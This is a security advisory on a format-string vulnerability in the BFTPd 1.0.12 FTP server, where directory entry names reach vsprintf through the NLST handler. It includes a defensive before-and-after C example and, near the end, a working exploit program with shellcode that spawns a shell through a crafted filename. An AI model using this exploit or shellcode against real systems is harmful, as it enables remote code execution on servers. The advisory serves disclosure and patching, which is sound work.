[ SOURCE: http://www.secureroot.com/security/advisories/9761914935.html ]
Malformed vsprintf in BFTPd allows execution of arbitrary code
------------------------------------------------------------------------
SUMMARY
BFTPd is a Linux FTP server with chroot and setreuid functionality. The
latest version of BFTPd has a potential security problem when the NLST
command is asked to list a file whose name contains a format string. The
vulnerability allows remote attackers to overflow internal buffers and
execute arbitrary code.
DETAILS
Vulnerable systems:
BFTPd 1.0.12
There is a malformed call to vsprintf in BFTPd. The relevant vulnerable
function is sendstrf:

    int sendstrf(int s, char *format, ...) {
    ....
        vsprintf(buffer, format, val);

When the function is called from the NLST handler, the directory entry name
is passed directly as the format string to vsprintf, so a client-supplied
filename controls the format:

        else
            foo = 1;
        sendstrf(s, entry->d_name);
    }

Because vsprintf has no length bound, a filename containing format
directives can be used to overflow the vsprintf buffer and execute
arbitrary code.
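The fix the advisory implies, shown as an added example that is not BFTPd's code: the unbounded shape of sendstrf beside a bounded version that takes the entry name as a "%s" argument rather than as the format, plus a small check for names containing '%' that a defender can run over a directory listing or a log. The function names, the 256-byte buffer size and the reply format "%s\r\n" are assumptions, not taken from the BFTPd source.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 256   /* assumed size; the advisory does not give BFTPd's */

/* BEFORE (shape of the advisory's sendstrf): the caller's string is the
 * format, and vsprintf has no length bound.  Passing entry->d_name here
 * lets a filename containing % directives drive the formatter and write
 * past the end of 'out'.  Kept only for comparison; never call it with
 * untrusted input. */
int sendstrf_unbounded(char *out, const char *format, ...) {
    va_list val;
    va_start(val, format);
    int n = vsprintf(out, format, val);
    va_end(val);
    return n;
}

/* AFTER: the format is always a literal chosen by the caller, and
 * vsnprintf stops at outlen.  Returns the number of bytes written, or -1
 * if the reply did not fit (the caller can then refuse the entry instead
 * of sending a truncated line). */
int sendstrf_bounded(char *out, size_t outlen, const char *format, ...) {
    va_list val;
    va_start(val, format);
    int n = vsnprintf(out, outlen, format, val);
    va_end(val);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Shared reply buffer, so results can be inspected without the caller
 * managing storage. */
static char reply[BUFFER_SIZE];

/* Models one iteration of the NLST loop on the fixed code path: the
 * directory entry name is an argument to a "%s" format, never the format
 * itself.  outlen is capped at the buffer size. */
int format_nlst_reply(const char *d_name, size_t outlen) {
    if (outlen > sizeof reply)
        outlen = sizeof reply;
    return sendstrf_bounded(reply, outlen, "%s\r\n", d_name);
}

const char *last_reply(void) {
    return reply;
}

/* Cheap audit check for log review or directory scanning: a filename that
 * contains '%' would have been interpreted by the vulnerable server. */
int name_has_format_directive(const char *d_name) {
    return strchr(d_name, '%') != NULL;
}

int main(void) {
    /* Constructed sample entries: one benign, one shaped like the
     * advisory's "%.260x" pattern.  Both go through the bounded path only. */
    const char *entries[] = { "README", "%.260x" };
    for (size_t i = 0; i < 2; i++) {
        int n = format_nlst_reply(entries[i], sizeof reply);
        printf("entry %-8s directive=%d written=%d reply=%s",
               entries[i], name_has_format_directive(entries[i]), n,
               last_reply());
    }
    return 0;
}
```

With the bounded version the "%.260x" name is emitted verbatim as eight bytes of data, and an entry that does not fit the buffer is reported as -1 rather than silently overrunning it.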
Exploit:

/*
 * Creates a filename to exploit the bug in bftpd 1.0.12.
 * Create the file, cwd in the shell directory and nlist the file directory
 * (sh is executed in the working dir because it is not possible to insert a
 * / in the filename).
 *
 * hints by |CyRaX| & Cthulhu
 * coded by asynchro
 * www.pkcrew.org
 */
#include
#include
#define BUFSIZE 512
#define NOP 124
main()
{
    int i;
    char *buff;
    char nop=0x90;
    char addr[]="\xd4\xf9\xff\xbf";
    char command[]="touch %.260x";
    char shellcode[]=
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xffsh";
    buff=(char *) malloc(BUFSIZE);
    memset(buff,0x0,BUFSIZE);
    memcpy(buff,command,sizeof(command));
    strncat(buff,addr,4);
    strncat(buff,addr,4);
    for(i=0; i < NOP ;i++)
    {
        strncat(buff,&nop,1);
    }
    strncat(buff,shellcode,strlen(shellcode));
    system(buff);
}
ADDITIONAL INFORMATION
The information has been provided by asynchro.